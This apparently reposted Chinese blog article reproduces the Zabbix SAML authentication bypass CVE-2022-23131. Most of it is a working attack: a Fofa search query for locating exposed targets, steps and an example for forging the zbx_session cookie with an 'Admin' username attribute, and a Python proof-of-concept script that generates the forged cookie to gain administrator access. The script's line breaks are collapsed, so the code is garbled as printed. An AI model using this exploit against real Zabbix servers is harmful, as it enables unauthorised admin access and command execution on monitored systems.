本文主要是介绍Zabbix登录绕过漏洞复现(CVE-2022-23131),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Zabbix登录绕过漏洞复现(CVE-2022-23131)
漏洞描述
安全断言标记语言 (SAML) 是最常见的单点登录 (SSO) 标准之一。围绕 XML 实现,它允许身份提供者(IdP,一个能够对用户进行身份验证的实体)告诉服务提供者(SP,这里是 Zabbix)你是谁。您可以将Zabbix Web 前端配置为允许通过 SAML 进行用户身份验证,但默认情况下不启用它,因为它需要了解身份提供者的详细信息。这是企业部署最常见的设置。
在启用 SAML SSO 身份验证的实例上,它允许绕过身份验证并获得管理员权限。攻击者可以使用此访问权限在链接的Zabbix Server和Zabbix Agent实例上执行任意命令。
影响版本
Zabbix Web 前端版本包括
- 5.4.8
- 5.0.18
- 4.0.36
- 6.0.0alpha1
漏洞复现
Fofa 语法 app="ZABBIX-监控系统" && body="saml"
点击 Sign in 下面的 Sign in with Single Sign-On (SAML)
使用 Burp 抓包
复制 zbx_session 的值,使用 base64 解密一下
解密出来的数据和 {"saml_data":{"username_attribute":"Admin"} 结合一下
{"saml_data":{"username_attribute":"Admin"},"sessionid":"34deaa6a30e4208c183b335881a90a31","sign":"1YVxmgvUSc88AlgUPD3lsAmd1hAZoy+rRxNktEwqjxxT0NywAeDBjARJugpYGuVqPU8CfGtwkNgknfUstaK5\/Q=="}
然后使用 base64 加密一下
eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiMzRkZWFhNmEzMGU0MjA4YzE4M2IzMzU4ODFhOTBhMzEiLCJzaWduIjoiMVlWeG1ndlVTYzg4QWxnVVBEM2xzQW1kMWhBWm95K3JSeE5rdEV3cWp4eFQwTnl3QWVEQmpBUkp1Z3BZR3VWcVBVOENmR3R3a05na25mVXN0YUs1XC9RPT0ifQ==
然后替换 zbx_session 的值
Python 脚本
Python 脚本代码
# codingimport sys
import requests
import re,base64,urllib.parse,json
# 禁用警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)def runPoc(url):response = requests.get(url,verify=False)cookie = response.headers.get("Set-Cookie")sessionReg = re.compile("zbx_session=(.*?);")try:session = re.findall(sessionReg,cookie)[0]base64_decode = base64.b64decode(urllib.parse.unquote(session,encoding="utf-8"))session_json = json.loads(base64_decode)payload = '{"saml_data":{"username_attribute":"Admin"},"sessionid":"%s","sign":"%s"}'%(session_json["sessionid"],session_json["sign"])print("未加密Payload:" + payload)print('\n')payload_encode = urllib.parse.quote(base64.b64encode(payload.encode()))print("加密后Payload:" + payload_encode)except IndexError:print("[-] 不存在漏洞")if __name__ == '__main__':try:url = sys.argv[1]runPoc(url)except IndexError:print("""Use: python CVE-2022-23131.py http://xxxxxxxxx.comBy:MrHatSec""")
python3 CVE-2022-23131.py url
将生成的加密后的 Payload 替换到当前目标的 Cookie中,即可直接进入管理界面
这篇关于Zabbix登录绕过漏洞复现(CVE-2022-23131)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
